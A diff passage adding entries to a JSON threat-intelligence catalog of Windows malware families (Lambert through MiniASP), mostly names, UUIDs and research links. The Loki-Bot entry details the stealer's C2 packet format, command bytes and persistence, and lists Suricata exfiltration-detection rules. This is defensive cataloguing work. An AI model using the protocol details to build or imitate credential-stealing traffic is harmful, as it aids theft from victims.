+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", + "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", + "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", + "http://adelmas.com/blog/longhorn.php", + "https://www.youtube.com/watch?v=jeLd-gw2bWo" + ] + }, + "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", + "value": "Lambert", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin", + "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" + ] + }, + "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", + "value": "Lamdelin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", + "http://malware-traffic-analysis.net/2017/04/25/index.html", + "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", + "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", + "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/", + "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access" + ] + }, + "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", + "value": "LatentBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus", + "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", + "https://twitter.com/PhysicalDrive0/status/828915536268492800", + "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", + "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html" + ] + }, + "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", + "value": "Lazarus", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", + "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", + "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" + ] + }, + "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", + "value": "Laziok", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" + ] + }, + "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", + "value": "Leash", + "description": "" + }, + { + "meta": { + "synonyms": [ + "shoco" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", + "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", + "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html", + "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html" + ] + }, + "uuid": "41da41aa-0729-428a-8b82-636600f8e230", + "value": "Leouncia", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", + "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", + "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/", + "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", + "http://www.malware-traffic-analysis.net/2017/11/02/index.html" + ] + }, + "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", + "value": "Lethic", + "description": "Lethic is a spambot dating back to 2008. 
It is known to be distributing low-level pharmaceutical spam." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail" + ] + }, + "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", + "value": "Limitail", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", + "value": "Listrix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", + "https://malware.news/t/recent-litehttp-activities-and-iocs/21053", + "https://github.com/zettabithf/LiteHTTP" + ] + }, + "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", + "value": "LiteHTTP", + "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. 
\r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", + "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", + "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", + "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", + "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", + "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", + "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", + "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" + ] + }, + "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", + "value": "Locky", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" + ] + }, + "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", + "value": "Locky (Decryptor)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" + ] + }, + "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", + "value": "Locky Loader", + "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", + "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", + "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", + "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" + ] + }, + "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", + "value": "LockPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Nymeria" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", + "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", + "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" + ] + }, + "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", + "value": "Loda", + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + ] + }, + "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", + "value": "Logedrut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", + "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" + ] + }, + "uuid": "2789b246-d762-4d38-8cc8-302293e314da", + "value": "LogPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Loki", + "LokiPWS", + "LokiBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", + "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", + "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", + "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", + "https://github.com/R3MRUM/loki-parse", + "http://www.malware-traffic-analysis.net/2017/06/12/index.html", + "http://blog.fernandodominguez.me/lokis-antis-analysis/", + "https://phishme.com/loki-bot-malware/", + "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", + "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", + "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", + "value": "Loki Password Stealer (PWS)", + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a 
command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. 
By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat",
+ "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/",
+ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/",
+ "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark",
+ "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/",
+ "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html",
+ "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/"
+ ]
+ },
+ "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a",
+ "value": "Luminosity RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk",
+ "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader"
+ ]
+ },
+ "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776",
+ "value": "Lurk",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo"
+ ]
+ },
+ "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2",
+ "value": "Luzo",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Lucky Locker",
+ "Adneukine",
+ "Bomba Locker"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit",
+ "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/",
+ "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html",
+ "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html"
+ ]
+ },
+ "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a",
+ "value": "Lyposit",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "El Machete"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete",
+ "https://securelist.com/el-machete/66108/",
+ "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html",
+ "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6"
+ ]
+ },
+ "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff",
+ "value": "Machete",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax",
+ "https://www.arbornetworks.com/blog/asert/mad-max-dga/"
+ ]
+ },
+ "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de",
+ "value": "MadMax",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala",
+ "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/"
+ ]
+ },
+ "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b",
+ "value": "Magala",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber",
+ "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/",
+ "https://www.youtube.com/watch?v=lqWJaaofNf4",
+ "http://asec.ahnlab.com/1124"
+ ]
+ },
+ "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29",
+ "value": "Magniber",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/"
+ ]
+ },
+ "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9",
+ "value": "MajikPos",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs",
+ "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html",
+ "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs"
+ ]
+ },
+ "uuid": "996e73e9-b093-4987-9992-f52008e55b24",
+ "value": "Makadocs",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader",
+ "https://twitter.com/James_inthe_box/status/1046844087469391872"
+ ]
+ },
+ "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82",
+ "value": "MakLoader",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub",
+ "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/",
+ 
"https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", + "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/" + ] + }, + "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", + "value": "Maktub", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos", + "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" + ] + }, + "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", + "value": "MalumPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HDDCryptor", + "DiskCryptor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", + "https://securelist.com/the-return-of-mamba-ransomware/79403/" + ] + }, + "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", + "value": "Mamba", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CryptoHost" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt", + "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", + "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" + ] + }, + "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", + "value": "ManameCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "junidor", + "mengkite", + "vedratve" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", + "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" + ] + }, + "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", + "value": "Mangzamel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], 
+ "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware", + "https://twitter.com/struppigel/status/811587154983981056" + ] + }, + "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", + "value": "Manifestus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", + "value": "ManItsMe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", + "value": "MAPIget", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" + ] + }, + "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", + "value": "Marap", + "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker", + "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" + ] + }, + "uuid": "59717468-271e-4d15-859a-130681c17ddb", + "value": "Matrix Banker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom" + ] + }, + "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", + "value": "Matrix Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", + "http://www.clearskysec.com/tulip/" + ] + }, + "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", + "value": "Matryoshka RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu", + "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" + ] + }, + "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", + "value": "Matsnu", + "description": "" + }, + { + "meta": { + "synonyms": [ + "DexLocker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", + "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", + "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", + "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d", + "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html" + ] + }, + "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", + "value": "MBRlock", + "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts." 
+ }, + { + "meta": { + "synonyms": [ + "MyBios" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", + "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", + "https://www.symantec.com/connect/blogs/bios-threat-showing-again", + "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/", + "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/" + ] + }, + "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", + "value": "Mebromi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre", + "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" + ] + }, + "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", + "value": "Medre", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", + "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/", + "https://news.drweb.com/show/?i=10302&lng=en", + "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", + "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/" + ] + }, + "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", + "value": "win.medusa", + "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" + ] + }, + "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", + "value": "Mewsei", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", + "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" + ] + }, + "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", + "value": "Miancha", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass", + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + ] + }, + "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", + "value": "Micrass", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", + "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", + "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" + ] + }, + "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", + "value": "Microcin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", + "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", + "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" + ] + }, + "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", + "value": "Micropsia", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" + ] + }, + "uuid": 
"87abb59d-0012-4d45-9e75-136372b25bf8", + "value": "Mikoponi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", + "value": "MILKMAID", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", + "https://github.com/gentilkiwi/mimikatz", + " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", + "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle" + ] + }, + "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", + "value": "MimiKatz", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", + "value": "MiniASP", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", + 